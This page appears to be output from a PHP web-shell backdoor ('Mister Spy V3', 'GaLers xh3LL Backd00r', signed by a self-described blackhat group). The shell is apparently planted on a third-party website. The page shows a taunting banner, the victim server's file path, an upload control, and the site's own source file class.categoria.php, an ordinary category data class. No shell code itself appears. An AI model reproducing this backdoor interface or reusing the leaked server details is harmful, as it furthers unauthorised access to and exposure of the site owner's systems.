Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/www/web/library/
Upload File :
Current File : /home/caballoscriollos/www/web/library/class.categoria.php

<?php

require_once('class.secciones.php');

class Categoria
{
	const PathImageBig		= '';
	const PathImageThumb	= '';

	public $IdCategoria;
	public $IdTipo;
	public $KeyCategoria;
	public $Nombre;
	public $IdEstado;
	public $Imagen;
	public $Descripcion;
	public $Disponible;
	public $Anio;
	public $Disciplina;
	public $Color;
	public $NombreAlternativo;
	
	public function ParseFromArray(array $arr)
	{
		$this->IdCategoria 			= $arr['IdCategoria'];
		$this->IdTipo 				= $arr['IdTipo'];
		$this->KeyCategoria			= $arr['KeyCategoria'];
		$this->Nombre 				= stripslashes($arr['Nombre']);
		$this->IdEstado				= $arr['IdEstado'];
		$this->Imagen				= $arr['Imagen'];
		$this->Descripcion			= $arr['Descripcion'];
		$this->Disponible			= $arr['Disponible'];
		$this->Anio					= $arr['Anio'];
		$this->Disciplina			= $arr['Disciplina'];
		$this->Color				= $arr['Color'];
		$this->NombreAlternativo 	= $arr['NombreAlternativo'];
	}
	

	public function CanDelete()
	{
		if (count($this->GetAllSecciones()) > 0)
			return false;

		return true;
	}

	
	public function GetAllNoticias()
	{
		$Noticias = new Noticias();

		return $Noticias->GetAllByCategoria($this);
	}
	
	
	public function GetAllEventos()
	{
		$Eventos = new Eventos();
		
		return $Eventos->GetAllByCategoria($this);
	}
	
	
	public function GetAllLinks()
	{
		$Links = new Links();
		
		return $Links->GetAllByCategoria($this);
	}
	
	
	public function GetAllGaleria()
	{
		$GaleriaImagenes = new GaleriaImagenes();
		
		return $GaleriaImagenes->GetAllByCategoria($this);
	}
	
	
	public function GetAllVideos()
	{
		$Videos = new Videos();
		
		return $Videos->GetAllByCategoria($this);
	}
	
	
	public function GetAllArchivos()
	{
		$Archivos = new Archivos();
		
		return $Archivos->GetAllByCategoria($this);
	}
	
	
	public function GetAllAudios()
	{
		$Audios = new Audios();
		
		return $Audios->GetAllByCategoria($this);
	}
	
	
	public function GetAllFaqs()
	{
		$Faqs = new Faqs();
		
		return $Faqs->GetAllByCategoria($this);
	}
	
	
	public function GetAllSecciones()
	{
		$oSecciones = new Secciones();
		
		return $oSecciones->GetAll(array('IdCategoria' => $this->IdCategoria));
	}
}

?>

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat